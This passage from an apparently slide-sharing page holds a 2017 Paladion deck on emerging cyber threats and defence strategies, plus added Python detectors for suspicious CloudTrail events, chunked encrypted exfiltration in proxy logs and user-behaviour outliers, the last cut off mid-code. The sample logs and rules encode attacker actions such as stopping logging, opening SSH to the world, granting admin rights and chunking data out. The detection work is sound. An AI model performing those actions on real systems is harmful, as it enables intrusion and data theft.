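     "additionalEventData": {"MFAUsed": "Yes"}},
    {"eventID": "e3", "eventSource": "ec2.amazonaws.com", "eventName": "AuthorizeSecurityGroupIngress",
     "userIdentity": {"type": "IAMUser", "userName": "dev.builder"},
     "requestParameters": {"groupId": "sg-0a1b2c3d", "ipPermissions": {"items": [
         {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
          "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
    {"eventID": "e4", "eventSource": "ec2.amazonaws.com", "eventName": "AuthorizeSecurityGroupIngress",
     "userIdentity": {"type": "IAMUser", "userName": "dev.builder"},
     "requestParameters": {"groupId": "sg-0a1b2c3e", "ipPermissions": {"items": [
         {"ipProtocol": "tcp", "fromPort": 443, "toPort": 443,
          "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
    {"eventID": "e5", "eventSource": "cloudtrail.amazonaws.com", "eventName": "StopLogging",
     "userIdentity": {"type": "IAMUser", "userName": "dev.builder"},
     "requestParameters": {"name": "arn:aws:cloudtrail:us-east-1:123456789012:trail/main"}},
    {"eventID": "e6", "eventSource": "iam.amazonaws.com", "eventName": "AttachUserPolicy",
     "userIdentity": {"type": "IAMUser", "userName": "dev.builder"},
     "requestParameters": {"userName": "svc-deploy", "policyArn": ADMIN_POLICY}},
]})

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Records e1, e3, e5 and e6 fire; the MFA-protected IAM login and the security group opened on 443 (a web port that is meant to be public) do not. The "speed of controls" requirement above is why this runs on the event stream rather than a nightly scan: an `AuthorizeSecurityGroupIngress` that opens port 22 to the world is exploitable within minutes, so the hit should drive an automated revoke (or the Policy Enforcer from the VM platform) rather than a ticket.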
Contact us today to combat today's sophisticated cyber threats
Visit: www.paladion.net
E-mail: sales@paladion.net
PRESENTATION▶ Cyber Security Services (CSS): Security Simulation
 
User Behavior Analytics And The Benefits To Companies
User Behavior Analytics And The Benefits To CompaniesUser Behavior Analytics And The Benefits To Companies
User Behavior Analytics And The Benefits To Companies
 
Building a Successful Threat Hunting Program
Building a Successful Threat Hunting ProgramBuilding a Successful Threat Hunting Program
Building a Successful Threat Hunting Program
 
Gov Day Sacramento 2015 - User Behavior Analytics
Gov Day Sacramento 2015 - User Behavior AnalyticsGov Day Sacramento 2015 - User Behavior Analytics
Gov Day Sacramento 2015 - User Behavior Analytics
 
Dealing with the insider threat.
Dealing with the insider threat.Dealing with the insider threat.
Dealing with the insider threat.
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
 
Workshop threat-hunting
Workshop threat-huntingWorkshop threat-hunting
Workshop threat-hunting
 
Threat Intelligence Tweaks That'll Take Your Security to the Next Level
Threat Intelligence Tweaks That'll Take Your Security to the Next LevelThreat Intelligence Tweaks That'll Take Your Security to the Next Level
Threat Intelligence Tweaks That'll Take Your Security to the Next Level
 
Cyber Security Strategies and Approaches
Cyber Security Strategies and ApproachesCyber Security Strategies and Approaches
Cyber Security Strategies and Approaches
 

Similar to Strategies to Combat New, Innovative Cyber Threats - 2017

Global Cyber Attacks report 2018 - 2019 | HaltDos
Global Cyber Attacks report 2018 - 2019 | HaltDosGlobal Cyber Attacks report 2018 - 2019 | HaltDos
Global Cyber Attacks report 2018 - 2019 | HaltDosHaltdos
 
Cyber Security Vulnerabilities
Cyber Security VulnerabilitiesCyber Security Vulnerabilities
Cyber Security VulnerabilitiesSiemplify
 
Dell Technologies Cyber Security playbook
Dell Technologies Cyber Security playbookDell Technologies Cyber Security playbook
Dell Technologies Cyber Security playbookMargarete McGrath
 
Guide to high volume data sources for SIEM
Guide to high volume data sources for SIEMGuide to high volume data sources for SIEM
Guide to high volume data sources for SIEMJoseph DeFever
 
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONSCybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONSRandall Chase
 
Cybersecurity in BFSI - Top Threats & Importance
Cybersecurity in BFSI - Top Threats & ImportanceCybersecurity in BFSI - Top Threats & Importance
Cybersecurity in BFSI - Top Threats & Importancemanoharparakh
 
Security troubles in e commerce website
Security troubles in e commerce websiteSecurity troubles in e commerce website
Security troubles in e commerce websiteDr. Raghavendra GS
 
Matt_Cyber Security Core Deck September 2016.pptx
Matt_Cyber Security Core Deck September 2016.pptxMatt_Cyber Security Core Deck September 2016.pptx
Matt_Cyber Security Core Deck September 2016.pptxNakhoudah
 
White Paper Example - Brafton for NIP Group.pdf
White Paper Example - Brafton for NIP Group.pdfWhite Paper Example - Brafton for NIP Group.pdf
White Paper Example - Brafton for NIP Group.pdfBrafton
 
Cyber-Security-Presentation-2_2017.pptx.ppt
Cyber-Security-Presentation-2_2017.pptx.pptCyber-Security-Presentation-2_2017.pptx.ppt
Cyber-Security-Presentation-2_2017.pptx.pptNiteshRajput1123
 
What Ransomware Taught us in 2021?
What Ransomware Taught us in 2021?What Ransomware Taught us in 2021?
What Ransomware Taught us in 2021?MaryJWilliams2
 
Supersized Security Threats – Can You Stop 2016 from Repeating?
Supersized Security Threats – Can You Stop 2016 from Repeating?Supersized Security Threats – Can You Stop 2016 from Repeating?
Supersized Security Threats – Can You Stop 2016 from Repeating?Valerie Lanzone
 
Future of Cyber-security Economy
Future of Cyber-security EconomyFuture of Cyber-security Economy
Future of Cyber-security EconomyBehnaz Aria
 
Security - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaperSecurity - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaperCMR WORLD TECH
 

Similar to Strategies to Combat New, Innovative Cyber Threats - 2017 (20)

Global Cyber Attacks report 2018 - 2019 | HaltDos
Global Cyber Attacks report 2018 - 2019 | HaltDosGlobal Cyber Attacks report 2018 - 2019 | HaltDos
Global Cyber Attacks report 2018 - 2019 | HaltDos
 
Cyber Security Vulnerabilities
Cyber Security VulnerabilitiesCyber Security Vulnerabilities
Cyber Security Vulnerabilities
 
Dell Technologies Cyber Security playbook
Dell Technologies Cyber Security playbookDell Technologies Cyber Security playbook
Dell Technologies Cyber Security playbook
 
Guide to high volume data sources for SIEM
Guide to high volume data sources for SIEMGuide to high volume data sources for SIEM
Guide to high volume data sources for SIEM
 
Insights success the 10 best performing cyber security solution providers 4th...
Insights success the 10 best performing cyber security solution providers 4th...Insights success the 10 best performing cyber security solution providers 4th...
Insights success the 10 best performing cyber security solution providers 4th...
 
CYBER THREAT FORCAST 2016
CYBER THREAT FORCAST 2016 CYBER THREAT FORCAST 2016
CYBER THREAT FORCAST 2016
 
CYBER THREAT FORCAST 2016
CYBER THREAT FORCAST 2016 CYBER THREAT FORCAST 2016
CYBER THREAT FORCAST 2016
 
Cyber Crime is Wreaking Havoc
Cyber Crime is Wreaking HavocCyber Crime is Wreaking Havoc
Cyber Crime is Wreaking Havoc
 
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONSCybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
 
Cybersecurity in BFSI - Top Threats & Importance
Cybersecurity in BFSI - Top Threats & ImportanceCybersecurity in BFSI - Top Threats & Importance
Cybersecurity in BFSI - Top Threats & Importance
 
Security troubles in e commerce website
Security troubles in e commerce websiteSecurity troubles in e commerce website
Security troubles in e commerce website
 
Matt_Cyber Security Core Deck September 2016.pptx
Matt_Cyber Security Core Deck September 2016.pptxMatt_Cyber Security Core Deck September 2016.pptx
Matt_Cyber Security Core Deck September 2016.pptx
 
White Paper Example - Brafton for NIP Group.pdf
White Paper Example - Brafton for NIP Group.pdfWhite Paper Example - Brafton for NIP Group.pdf
White Paper Example - Brafton for NIP Group.pdf
 
CII Whitepaper India Cyber Risk & Resilience Review 2018
CII Whitepaper India Cyber Risk & Resilience Review 2018CII Whitepaper India Cyber Risk & Resilience Review 2018
CII Whitepaper India Cyber Risk & Resilience Review 2018
 
Cyber-Security-Presentation-2_2017.pptx.ppt
Cyber-Security-Presentation-2_2017.pptx.pptCyber-Security-Presentation-2_2017.pptx.ppt
Cyber-Security-Presentation-2_2017.pptx.ppt
 
What Ransomware Taught us in 2021?
What Ransomware Taught us in 2021?What Ransomware Taught us in 2021?
What Ransomware Taught us in 2021?
 
Supersized Security Threats – Can You Stop 2016 from Repeating?
Supersized Security Threats – Can You Stop 2016 from Repeating?Supersized Security Threats – Can You Stop 2016 from Repeating?
Supersized Security Threats – Can You Stop 2016 from Repeating?
 
The 10 Fastest Growing Cyber Security Companies of 2017
The 10 Fastest Growing Cyber Security Companies of 2017The 10 Fastest Growing Cyber Security Companies of 2017
The 10 Fastest Growing Cyber Security Companies of 2017
 
Future of Cyber-security Economy
Future of Cyber-security EconomyFuture of Cyber-security Economy
Future of Cyber-security Economy
 
Security - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaperSecurity - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaper
 

Recently uploaded

Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfngoud9212
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 

Recently uploaded (20)

Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 

Strategies to Combat New, Innovative Cyber Threats - 2017

• 1. Strategies to Combat New, Innovative Cyber Threats - 2017
  STRICTLY PRIVATE & CONFIDENTIAL © 2017

• 2. Enterprise Security for 2017
  Key cyber threats to defend against in 2017:
  - Ransomware and its evolving variants
  - Compromised business processes
  - Increased organizational social engineering
  - Insider technical compromises
  - Threats to non-perimeter assets
  Key cyber strategies to deploy in 2017:
  - Analytical, machine-learning-based detection
  - Enhanced endpoint detection
  - Orchestrated responses
  - Digital VM systems
  - CloudOps and DevOps security

• 3. New, Innovative Threats to Watch Out For
  - IoT threats: The Mirai botnet and the Dyn DDoS attack exposed the vulnerability of IoT systems, which act as a launch pad for other attacks. IoT device usage is expected to rise by 400% in 2017, making this a significant threat. Attacks on IoT devices such as cars, drones and industrial systems should also be considered.
  - Fake news attacks: The rise of social media and self-publishing, together with the shrinking attention span of readers, has increased the circulation of fake news. This will soon be used for cyber fraud by luring users to act on false information, for example selling stock.
  - AI and voice-first attacks: As interaction moves beyond touch to voice, new forms of attack are likely. Example 1: tricking AI algorithms with fake data to extract information, then having the voice-enabled system fool users into performing an action. Example 2: your banking bot could talk consumers into giving their credentials to attackers.
  - Smart city attacks: Smart city grids that control transportation, utilities, communication, financial services and other citizen data will be exposed to innovative attacks that leverage a single vector to impact multiple facilities, e.g. using business logic weaknesses to obtain data that enables further compromise.
  - Bionics attacks: Attacks on medical devices such as pacemakers are already being researched. As human capability and technology integrate further, attacks will become life-threatening. 2017 will see more concept-level threats showcased by researchers; the future will see a combination of neuro and cyber weapons as criminals catch on.
• 4. Key Threats 2017
• 5. Ransomware and Variants
  Malware objectives between 2001 and 2017 have grown to include file deletion, network clogging, botnet creation, data theft and resale, and data encryption for ransom.
  2016 saw a rapid increase in ransomware:
  - Incidents increased four-fold compared with 2015.
  - Total losses from ransomware attacks exceeded one billion USD, affecting over 100 thousand companies.
  - Ransomware variations have also increased: layered infections that bundle Trojans and keyloggers with ransomware, and selective encryption of files and folders.
  - Attackers are targeting high-risk sectors such as financial services, healthcare, utilities and SMBs.
  Opportunity: aided by more data on endpoints and easy anonymous payment options.
  2017 will see:
  - Ransomworm: ransomware combined with worm capabilities so that it spreads fast.
  - Double dipping: adding data-stealing capabilities alongside encryption to double the profit, once through the ransom paid by the organization and again through underground sale of the data.
  Refer to the Paladion paper for the top ransomware variants of 2016 and their IOCs for detection.
• 6. Business Process Compromise (BPC)
  BPC attacks are complex, combining social engineering, malware, account takeovers, man-in-the-middle attacks, sniffing and data exfiltration. Cyber criminals are increasingly targeting entire business processes. Attacks on banks target payment processes involving multiple assets, users and intimate transaction knowledge (e.g. Bangladesh Bank). Several copycat attacks on payment systems were reported in the financial sector during 2016. Attackers also targeted inventory management, vendor payment and supply chain processes.
  These attacks have a higher payoff (averaging millions of USD, as opposed to hundreds for ransomware). Larger, more organized cyber crime gangs and rogue nation-state players will be attracted to them. They take more time, skill and knowledge of internal processes, but the pay-off is significantly higher. Global losses are estimated at over 2 billion USD, affecting thousands of organizations.
  Organizations' ability to defend themselves is weaker today: the focus is on protecting individual assets and applications, while attack campaigns on business processes are ignored.
  2017 prediction: the average value of BPC attacks will go up, causing some organizations to lose tens of millions of USD. The number of affected organizations will remain lower, given the effort involved in launching such attacks.
• 7. Targeted Business Social Engineering
  Business social engineering schemes include CEO fraud, bogus invoice schemes, legal scare scams, identity takeover of executives and PII theft.
  Social engineering attacks on organizations have increased, with attackers researching employees and company strategy before scamming high-level employees. Attacker research draws on social media data, company news releases, technology case studies and internal data obtained through sniffing. Attackers then target lower-level employees with emails, social media communications and customized website messages.
  The majority of BPC attacks involve long campaigns of targeted social engineering. These attacks can also be short, non-technical attacks such as Business Email Compromise (BEC), which rose in 2016. BEC uses knowledge of an organization's internal processes to trick employees into making payments and other transactions on behalf of attackers. Estimated losses from BEC alone were over 3 billion USD in 2016, affecting over fifty thousand organizations globally.
  2017 prediction: given the amount of data available online about employees and organizations, this type of attack is easy to carry out. Innovation will no longer be in the technical aspects of an attack but in the fraud schemes. 2017 will see many variations on tricking employees into giving away data or money.
• 8. Hi-Tech Insider Abuse
  Insider threats have received less attention because of the stream of news about external attacks, but they continue to affect organizations despite their small number compared with external attacks (60% external versus less than 30% internal). Over the past few years two key controls, data leakage detection and privileged identity management, have contained this threat.
  Insider threats continue to rise as the composition of the workforce changes: today there is more technical know-how and teleworking, but less organizational empathy. The following attacks will get more sophisticated:
  - Bypassing data leakage detection through encryption
  - Chunking data out through micro-blogging
  - Masquerading as normal traffic
  - Collaboration with external threat actors
  2017 prediction: insider attacks will become as hi-tech as advanced external attacks, involving longer campaigns, multiple evasive tools and co-worker social engineering for credential theft.
  Sidebar, from "Nine Things You Need to Know about Insider Threats": 35% of organizations have experienced at least one insider incident, broken down as data leak 49%, fraud 41%, data breach 36% and IP theft 16% (the total exceeds 100% because some respondents had more than one type of incident).
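The evasion techniques listed on slide 8 (encrypting the payload, chunking it out through micro-blogging, blending in as normal traffic) still leave a footprint in web-proxy logs: many small POSTs in a short window to a content-sharing host, with request bodies whose character entropy looks like ciphertext rather than text. The detection below is an added example written for this page, not code from the deck or from Paladion; the log layout, the host list, every threshold and the sample lines are constructed assumptions.

```python
"""Spot chunked, encrypted uploads in web-proxy logs.

Added example for this page; not code from the deck or from Paladion.
The log layout, the host list, every threshold and the sample lines
below are assumptions chosen for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import math

# Hosts an insider might use to post data out in small, innocuous-looking
# pieces (assumed category list; a real deployment would take it from the proxy).
SHARING_HOSTS = {"paste.example.org", "microblog.example.net"}

WINDOW = timedelta(minutes=10)   # look-back window per (user, host)
MIN_CHUNKS = 5                   # posts in one window before we call it chunking
CHUNK_RANGE = (1_000, 8_000)     # bytes: small enough to pass for a normal post
ENTROPY_LIMIT = 5.0              # bits/char: text sits near 4, base64 ciphertext near 6


def shannon_entropy(text):
    """Bits of entropy per character of text (0.0 for an empty string)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line):
    """Parse '<ISO time> <user> <method> <host> <bytes_out> <body_sample>'."""
    ts, user, method, host, size, body = line.split(" ", 5)
    return {"ts": datetime.fromisoformat(ts), "user": user, "method": method,
            "host": host, "bytes": int(size), "body": body}


def find_chunked_exfil(lines):
    """One finding per (user, host) whose densest burst of small POSTs to a
    sharing host reaches MIN_CHUNKS; a second indicator fires when the
    bodies look like ciphertext."""
    posts = defaultdict(list)
    for raw in lines:
        ev = parse_line(raw)
        if ev["method"] == "POST" and ev["host"] in SHARING_HOSTS:
            posts[(ev["user"], ev["host"])].append(ev)

    findings = []
    for (user, host), events in posts.items():
        events.sort(key=lambda e: e["ts"])
        best = []                         # densest WINDOW-sized burst
        for i, start in enumerate(events):
            burst = [e for e in events[i:] if e["ts"] - start["ts"] <= WINDOW]
            if len(burst) > len(best):
                best = burst
        small = [e for e in best if CHUNK_RANGE[0] <= e["bytes"] <= CHUNK_RANGE[1]]
        if len(small) < MIN_CHUNKS:
            continue
        mean_entropy = sum(shannon_entropy(e["body"]) for e in small) / len(small)
        indicators = ["chunked_posts"]
        if mean_entropy > ENTROPY_LIMIT:
            indicators.append("high_entropy_body")
        findings.append({"user": user, "host": host, "posts": len(small),
                         "bytes": sum(e["bytes"] for e in small),
                         "mean_entropy": round(mean_entropy, 2),
                         "indicators": indicators})
    return findings


# Constructed sample log.  The "ciphertext" bodies are rotations of the base64
# alphabet, so every symbol appears once and the entropy is exactly 6 bits.
B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
SAMPLE_LOG = (
    ["2017-03-01T09:00:01 alice POST mail.example.com 820 Subject=weekly%20report"]
    + [f"2017-03-01T09:0{i}:10 bob POST paste.example.org {3800 + 50 * i} "
       f"{B64_ALPHABET[i:] + B64_ALPHABET[:i]}" for i in range(1, 8)]
    + [f"2017-03-01T09:1{i}:00 dave POST microblog.example.net 1500 lunch%20today%20anyone"
       for i in range(5)]
    + ["2017-03-01T09:20:00 carol POST microblog.example.net 1200 meeting%20moved",
       "2017-03-01T09:25:00 carol POST microblog.example.net 1300 meeting%20moved%20again"]
)

if __name__ == "__main__":
    for finding in find_chunked_exfil(SAMPLE_LOG):
        print(finding)
```

On the constructed log, bob's seven high-entropy posts to paste.example.org trip both indicators, dave's run of plain-text posts trips only the chunking one, and alice's mail traffic and carol's two posts produce nothing. The entropy test is a coarse proxy for encryption (base64 ciphertext sits near 6 bits per character, URL-encoded text near 4), so tune ENTROPY_LIMIT against real traffic before relying on it.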
• 9. Threats to Non-Perimeter Assets
  Three trends have already reached a tipping point:
  - Teleworking and personal devices used by an increasingly mobile workforce: 25% of employees work remotely at least part of the time, and 32% have used personal devices in addition to corporate devices.
  - Cloud-first strategy for both native cloud and SaaS applications: 57% of organizations have cloud assets today, and organizations have on average 3 SaaS apps deployed.
  - Social media used to administer corporate information and marketing: corporate data is 40% as likely to be in social media as in internal stores.
  Threats to these assets and to data outside the enterprise perimeter are a reality. Cloud and social media incidents involving corporate data have risen 70%.
  Organizations have not formalized risk modeling frameworks for these assets and data, and their on-premises risk mitigation does not transfer easily: monitoring for threats in a cloud requires a different architecture and data collection, and existing IPS and SIEM deployments cannot simply be extended to cover cloud assets.
  2017 prediction: attacks focused solely on non-perimeter assets will increase, and organizations will take significantly longer to discover them than the average of 150 days for on-premises attacks.
• 10. Key Strategies 2017
• 11. Strategy 1: Analytical and Machine Learning Systems
  Advanced threats are bypassing rule-based systems. Malware, account takeover attacks, lateral movement, data exfiltration and fraudulent transactions are being modified by attackers to avoid detection. The typical advanced attack is a long drawn-out campaign, like a war with multiple battles inside a single attack. Current detection systems cannot link individual alerts into the full campaign, so there is no big-picture view of the attack.
  2017 will see organizations adopt more analytical systems with machine learning capabilities and big data storage to solve both problems. Gartner estimates that over 50% of organizations will have security data warehouses with analytics data within the next four years. (For a detailed description of this strategy, refer to the Paladion report on Next Gen SOC and security analytics.)
  Machine learning analytics will be applied to network analytics, endpoint analytics, user and entity behavior analytics, and deeper mining of security alerts.
  - Use analytical and machine-learning-based systems for advanced malware and ransomware, low-and-slow attacks, unknown attack methods, data exfiltration and transaction fraud, and to see long drawn-out campaigns.
• 12. [Diagram: security analytics platform] A connector layer feeds raw data, context data and alert data into big data technology with data science; outputs go to a visual layer, collaboration, active discovery and active response (alerts). Methods shown: machine learning (outlier, pattern search, association and rare event algorithms); graph theory (link analysis, visual analytics); a multi-node streaming rule engine; data mining (statistical and probabilistic modelling).
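Slides 11 and 12 name the method families without showing what one looks like on data. The following is an added example, not code from the deck or from Paladion's platform, of two of them applied to user behavior analytics: a robust outlier score (median and MAD instead of mean and standard deviation, so one huge day cannot hide itself by inflating its own baseline) and a rare-event check (a source country never seen for that user). The baseline, the day under review and the thresholds are constructed assumptions.

```python
"""Outlier and rare-event scoring for user behavior analytics.

Added example for this page; not code from the deck or from Paladion.
The event layout, the 14-day baseline, the day under review and the
thresholds are all assumptions.
"""
from collections import defaultdict
from statistics import median

Z_LIMIT = 3.5        # robust z-score beyond which a day's volume is an outlier (assumed)
MAD_SCALE = 1.4826   # makes the MAD comparable to a standard deviation for normal data

# Constructed 14-day baseline: (day, user, source_country, megabytes_downloaded)
BASELINE = ([(d, "alice", "DE", 40 + (d % 3) * 5) for d in range(1, 15)]
            + [(d, "bob", "US", 200 + (d % 4) * 10) for d in range(1, 15)])
# Constructed events for the day under review
TODAY = [(15, "alice", "DE", 44), (15, "bob", "BR", 3200)]


def robust_z(value, history):
    """Median/MAD z-score: a few extreme days in history barely move it,
    unlike a mean/stddev score that the attacker's own traffic would inflate."""
    med = median(history)
    mad = median([abs(h - med) for h in history])
    if mad == 0:                       # flat history: any change at all is unusual
        return 0.0 if value == med else float("inf")
    return (value - med) / (MAD_SCALE * mad)


def build_profiles(events):
    """Per-user baseline: the list of daily volumes and the set of countries seen."""
    volumes = defaultdict(list)
    countries = defaultdict(set)
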